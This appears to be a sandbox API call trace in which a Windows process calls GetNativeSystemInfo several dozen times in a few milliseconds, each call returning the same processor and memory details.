	[0169.591] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.591] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.592] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.592] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.592] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.592] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.592] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.592] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.592] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.592] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.592] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.592] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.592] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.592] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.593] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.593] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.593] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.593] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.593] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.593] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.593] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.593] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.593] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.593] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.593] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.593] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.594] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.594] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.594] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.594] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.594] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.594] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.594] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.594] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.594] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.594] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.594] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.594] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.595] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.595] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.595] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.595] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.595] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.595] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.595] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.595] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.595] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.595] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.595] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.595] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.596] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.596] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.596] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.596] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.596] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.596] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.596] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.596] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.596] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.596] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.596] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.597] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.597] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
